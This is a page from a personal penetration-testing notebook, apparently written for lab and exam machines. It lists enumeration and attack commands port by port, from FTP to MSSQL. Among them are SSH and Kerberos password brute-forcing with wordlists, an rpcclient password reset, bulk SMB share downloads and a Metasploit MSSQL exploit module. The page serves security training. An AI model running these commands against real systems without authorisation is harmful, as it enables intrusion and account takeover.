[email protected]
Search…
[email protected]
About Calvin Lai (fkclai)
My Work
Exploit/CVE PoC
ZeroLogon Exploit
Remote Retrieved Chrome saved Encrypted Password
Twitter Control an RCE attack
Hacking Report (HTB)
Hits & Summary
Windows Machine
Linux Machine
Penetration Testing Checklists
Web Application PenTest
Network/System PenTest
Mobile Application PenTest
Red Team (Windows)
01 Reconnaissance
02 Privileges Escalation
03 Lateral Movement
04 AD Attacks
05 Bypass-Evasion
06 Kerberos Attack
99 Basic Command
Exploitation Guide
01 Reconnaissance
02 Port Enumeration
03 Web Enumeration
04 Windows Enum & Exploit
05 File Enumeration
06 Reverse Shell Cheat Sheet
07 SQL Injection
08 BruteForce
09 XSS Bypass Checklist
10 Spring Boot
11 WPA
12 Payload list
Vuln Hub (Writeup)
MrRobot
CYBERRY
MATRIX 1
Node-1
DPwwn-1
DC7
AiWeb-2
AiWeb-1
BrainPan
CTF (Writeup)
Hacker One
CTF Learn
P.W.N. University - CTF 2018
HITCON
Pwnable
Useful Command/Tools
Windows
Linux
Offensive Security Lab & Exam
Lab
Powered By GitBook
02 Port Enumeration

Port 21 - FTP

1
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5
Copied!

Port 22 - SSH

try to login with default/simple account : admin:admin, root:root, user:password
Brute Force
1
BruteForce:
2
​
3
patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
4
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5
5
medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
6
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5
Copied!

Port 25 - SMTP

1
nc -nvv 10.11.1.5 25
2
HELO foo<cr><lf>
3
​
4
telnet 10.11.1.5 25
5
VRFY root
Copied!
​https://tools.kali.org/information-gathering/smtp-user-enum
1
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.5
2
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.5
Copied!

Port 53 - DNS

1
dnsrecon -d 10.10.10.192
Copied!

Port 88 - Kerberos

1
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" 10.11.1.5
Copied!
GitHub - TarlogicSecurity/kerbrute: An script to perform kerberos bruteforcing by using impacket
GitHub
​
1
python kerbrute.py -dc-ip 10.11.1.5 -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
Copied!

Port 110 - Pop3

1
telnet 10.11.1.5
2
USER [email protected]
3
PASS abcd1234
4
​
5
or:
6
​
7
USER fkclai
8
PASS abcd1234
9
​
10
# List all emails
11
list
12
​
Copied!

Port 111 - Rpcbind

1
rpcinfo -p 10.11.1.5
2
rpcclient -U "" 10.11.1.5
3
#rpcclient gt;srvinfo
4
#rpcclient gt;enumdomusers
5
#rpcclient gt;querydominfo
6
#rpcclient gt;getdompwinfo //password policy
7
#rpcclient gt;netshareenum
8
#rpcclient gt;enumprivs
9
#rpcclient gt;setuserinfo2 <user id> 23 [email protected]
Copied!

Port 135 - MSRPC

1
nmap 10.11.1.5 --script=msrpc-enum
2
rpcdump.py 10.10.10.192 -p 135 >> /tmp/rpc.txt
Copied!

Port 139/445 - SMB

1
#Eumernation
2
smbmap -H 10.11.1.8
3
smbmap -u "guest" -p "" -H 10.11.1.31
4
nmap --script smb-enum-shares -p 139,445
5
enum4linux nest.htb
6
smbclient -L nest.htb
7
smbclient -U "r.thompson" -L \\\\10.10.10.182
8
smbclient -L //10.10.10.192 -N
9
​
10
# Check vulns
11
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.8
12
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.8
13
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.8
14
nmap --script vuln -p 135,139,445 10.10.10.40
15
​
Copied!
1
smbmap -u TempUser -p welcome2019 -H nest.htb -R
2
smbclient \\\\nest.htb\\Data -U TempUser
3
smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
4
mask ""
5
recurse ON
6
prompt OFF
7
mget *
8
​
Copied!

Port 389,636 LDAP

1
ldapsearch -h 10.11.1.8 -p 389 -x -b "dc=fkclai,dc=com"
2
ldapsearch -x -h 10.11.1.8 -D 'DOMAIN\fkclai' -w 'hash-password'
3
ldapdomaindump 10.11.1.8 -u 'DOMAIN\fkclai' -p 'hash-password'
4
​
5
windapsearch.py -d abcde.local --dc-ip 10.10.10.175 -U
6
https://github.com/ropnop/windapsearch
Copied!

Port 1433 MSSQL

1
nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.8
2
​
3
#MSF payload
4
use auxiliary/scanner/mssql/mssql_ping
5
use auxiliary/scanner/mssql/mssql_login
6
use exploit/windows/mssql/mssql_payload
Copied!
Exploitation Guide - Previous
01 Reconnaissance
Next - Exploitation Guide
03 Web Enumeration
Last modified 1yr ago
Copy link
Contents
Port 21 - FTP
Port 22 - SSH
Port 25 - SMTP
Port 53 - DNS
Port 88 - Kerberos
Port 110 - Pop3
Port 111 - Rpcbind
Port 135 - MSRPC
Port 139/445 - SMB
Port 389,636 LDAP
Port 1433 MSSQL